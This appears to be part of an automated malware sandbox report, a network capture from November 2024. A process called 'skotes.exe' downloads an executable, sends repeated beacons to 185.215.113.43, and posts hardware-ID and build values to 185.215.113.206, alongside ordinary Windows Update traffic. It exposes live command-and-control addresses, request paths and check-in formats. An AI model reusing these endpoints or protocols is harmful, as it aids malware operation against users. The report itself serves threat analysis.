00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ *`Ui` @ @.rsrc`2@.idata 8@qwqwnrei)):@usbtzceq `)@.taggant@*")@
Nov 7, 2024 07:33:43.369227886 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:43.369246006 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:43.369271994 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:43.369364977 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:43.369378090 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:43.369390965 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:43.369405031 CET	1236	IN	Data Raw: eb 0d 7a 91 33 a8 78 56 4a b9 7a de ba 8f 95 81 d6 64 e3 71 29 c2 8e 31 66 ff ac 50 80 62 3c 66 12 71 26 f5 8d 80 c3 b1 e2 38 b5 87 9d c6 68 51 59 fe 58 80 05 f3 6d 5c 4b c0 7b 5a 5b f6 31 63 5d 0b 49 90 33 f4 44 b8 17 ef 59 46 b9 e9 7b e1 75 10 Data Ascii: z3xVJzdq)1fPb<fq&8hQYXm\K{Z[1c]I3DYF{uKuq#@QMJd6k\|lROIo^CTOauHG:Q]Pm.1lOxJL[Cwc\$mGShobq`IHqF8n\3B=BgJp1B6dd7LG
Nov 7, 2024 07:33:43.369489908 CET	896	IN	Data Raw: c7 0c 53 a6 ff 0c 57 72 d6 19 da 87 b0 d1 4c 0f 08 d9 48 9a 3b c2 ae 70 79 74 b6 97 5f b1 46 91 09 d9 86 71 eb 91 8a 94 ee 02 c5 1f 5e 0c 93 91 09 ad 52 ce 3b b5 e2 85 2d 68 e8 db 77 d1 ee 78 39 d0 26 fb b0 8d 7d 28 5e 71 5e 91 c9 e0 c6 ef c1 49 Data Ascii: SWrLH;pyt_Fq^R;-hwx9&}(^q^IxU8X]\OE+@y."ty&q%F1[PafaPPSi,>yyGkRy^\xUqLxt4UZ_lWEQpqLzQE
Nov 7, 2024 07:33:43.369503975 CET	1236	IN	Data Raw: 23 a8 31 75 2c b7 7b 9c 7e 87 85 b3 1c 9d be c0 16 ad e7 d7 4b c5 08 85 8a a3 40 b1 2a bc 71 b6 19 08 a3 95 18 0e f8 d0 65 55 e2 d8 04 27 82 47 2b ac e3 1a c0 57 7a 0c 24 1c bf 7c 7b 0c 87 15 fd c4 e6 05 28 7d 96 b3 6b f7 98 5a ca 6e e0 b5 b7 8f Data Ascii: #1u,{~K@*qeU'G+Wz$\|{(}kZnF\|Bs,fJw8pu(puV53Ak}jdlUl\ufEg=?r>`#`qicw]XwjCkU(7C:H8
Nov 7, 2024 07:33:43.374156952 CET	1236	IN	Data Raw: 94 a3 0d 31 7a d5 b6 a6 21 33 7b 21 70 7a fe e3 30 f3 4c 63 59 b4 5e 4a d3 f6 d2 6b 8c b5 7e a1 5a c5 ba 29 ff a2 a1 7f 17 40 f6 93 e4 ae 57 3c 58 c2 44 cc 0b 93 7b a2 5d d9 02 ab 7c c7 22 7d 55 68 08 f3 4d 18 49 a6 f5 95 c2 7d f8 92 e6 3b 4d b3 Data Ascii: 1z!3{!pz0LcY^Jk~Z)@W<XD{]\|"}UhMI};Mm(11@-Ox@/nB^aOvQ-q,In]r]FlTC\|h>f\|yax}(, dw^oQm`p=~NN~d}V@>nzL<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50048	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:48.468693018 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004553001&unit=246122658369
Nov 7, 2024 07:33:49.704996109 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Nov 7, 2024 07:33:49.705749035 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50066	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:52.208040953 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 07:33:53.017793894 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50077	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:55.141815901 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 07:33:56.031339884 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50099	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:58.879232883 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 07:33:59.169409990 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50107	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:34:02.415946007 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 07:34:03.334131956 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:34:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50109	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:34:06.222964048 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 07:34:07.071274996 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:34:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	50110	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:34:08.920106888 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 07:34:09.780380011 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:34:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	50112	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:34:09.776118994 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 07:34:10.706672907 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:34:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 07:34:10.725701094 CET	412	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHC Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 44 42 42 44 39 43 30 34 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 2d 2d 0d 0a Data Ascii: ------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="hwid"25DBBD9C0463748140731------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="build"tale------FCFBAKJDBKJJKFIDBGHC--
Nov 7, 2024 07:34:11.021935940 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:34:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	50113	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:34:11.660420895 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 07:34:12.568655014 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:34:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	50116	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:34:28.212861061 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 07:34:29.148878098 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:34:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 07:34:29.337083101 CET	412	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGC Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 44 42 42 44 39 43 30 34 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 2d 2d 0d 0a Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="hwid"25DBBD9C0463748140731------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="build"tale------AKKKFBGDHJKFHJJJJDGC--
Nov 7, 2024 07:34:29.633110046 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:34:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:32:15 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZZPMoS3BkMFh9ST&MD=68AFPEt1 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-07 06:32:15 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: a515b09a-d024-41dc-a0fa-5e56d74836eb MS-RequestId: b6711ad2-57bb-42dd-b61c-591bb2df6d39 MS-CV: 9R19tUpWU0C6HzXJ.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 07 Nov 2024 06:32:15 GMT Connection: close Content-Length: 24490
2024-11-07 06:32:15 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-07 06:32:15 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:32:53 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZZPMoS3BkMFh9ST&MD=68AFPEt1 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-07 06:32:53 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 287b6466-bd38-40e7-b724-2f8d2e5df93f MS-RequestId: 5ddec8af-28f9-4a38-a764-cb0bdb1e6469 MS-CV: jCNAGgaM+U+0lGwE.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 07 Nov 2024 06:32:52 GMT Connection: close Content-Length: 30005
2024-11-07 06:32:53 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-07 06:32:53 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.4	49737	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:32:57 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:32:58 UTC	471	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:32:57 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Tue, 05 Nov 2024 17:40:36 GMT ETag: "0x8DCFDC0F4F27BCD" x-ms-request-id: a74cbab7-101e-0017-041c-3047c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063257Z-15869dbbcc6b2ncxhC1DFW2ztg000000018000000000f1xx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
